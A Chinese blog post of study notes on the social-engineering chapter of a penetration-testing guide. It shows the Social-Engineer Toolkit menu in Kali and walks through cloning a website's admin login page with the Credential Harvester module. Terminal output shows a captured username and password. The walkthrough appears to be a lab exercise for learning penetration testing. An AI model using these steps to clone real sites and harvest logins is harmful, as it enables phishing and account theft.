渗透测试实践-社会工程

  • 2017-12-25
  • 63
  • 0

本文是我阅读《渗透测试实践指南·第五章·社会工程》所做的笔记。

零、SET简介

SET,Social-Engineer Toolkit,社会工程学工具集。

在Kali中启动SET:

root@kali:~# setoolkit
 Select from the menu:

   1) Social-Engineering Attacks(社会工程学攻击)
       1) Spear-Phishing Attack Vectors(鱼叉式攻击引导)
       2) Website Attack Vectors(网站攻击向量引导)
           1) Java Applet Attack Method(java applet攻击模块)
           2) Metasploit Browser Exploit Method(Metasploit浏览器漏洞攻击模块)
           3) Credential Harvester Attack Method(凭据收割机攻击模块(钓鱼网站))
           4) Tabnabbing Attack Method(标签钓鱼攻击模块)
           5) Web Jacking Attack Method(Web点击劫持攻击模块)
           6) Multi-Attack Web Method(多攻击模块)
           7) Full Screen Attack Method(全屏攻击模块)
           8) HTA Attack Method(HTML应用程序攻击模块)
       3) Infectious Media Generator(传播媒介生成器(生成木马))
       4) Create a Payload and Listener(建立payloaad和listener)
       5) Mass Mailer Attack(邮件群发攻击)
       6) Arduino-Based Attack Vector(Arduino基础攻击引导)
       7) Wireless Access Point Attack Vector(无线接入点攻击引导)
       8) QRCode Generator Attack Vector(二维码攻击引导)
       9) Powershell Attack Vectors(Powershell攻击引导)
      10) SMS Spoofing Attack Vector(SMS欺骗攻击引导)
      11) Third Party Modules(第三发模块)
   2) Penetration Testing (Fast-Track)(渗透测试(快速追踪))
       1) Microsoft SQL Bruter(微软SQL密码爆破)
       2) Custom Exploits(定制攻击)
       3) SCCM Attack Vector(SCCM攻击引导)
       4) Dell DRAC/Chassis Default Checker(Dell DRAC/Chassis默认检查器)
       5) RID_ENUM - User Enumeration Attack(RID_ENUM - 用户枚举攻击)
       6) PSEXEC Powershell Injection(PSEXEC Powershell注入)
   3) Third Party Modules(第三方模块)
   4) Update the Social-Engineer Toolkit(升级软件)
   5) Update SET configuration(升级配置)
   6) Help, Credits, and About(帮助)

  99) Exit the Social-Engineer Toolkit(退出)

set> 

一、制作钓鱼网站

在Kali中启动SET,依次选择Social-Engineering Attacks–>Website Attack Vectors–>Credential Harvester Attack Method:

set:webattack>2

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates(网站模版)
   2) Site Cloner(克隆网站)
   3) Custom Import(定制导入)

  99) Return to Webattack Menu

选择2),克隆网站,并填入接受数据的主机的IP地址和克隆的目标站点URL。

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.56.2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.searchconf.net/admin/

[*] Cloning the website: http://www.searchconf.net/admin/
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.56.3 - - [25/Dec/2017 02:23:36] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: csrfmiddlewaretoken=eMXKzkzYiho9uP9zFiMnUDes0WAmzIne
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=123123
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

评论

还没有任何评论,你来说两句吧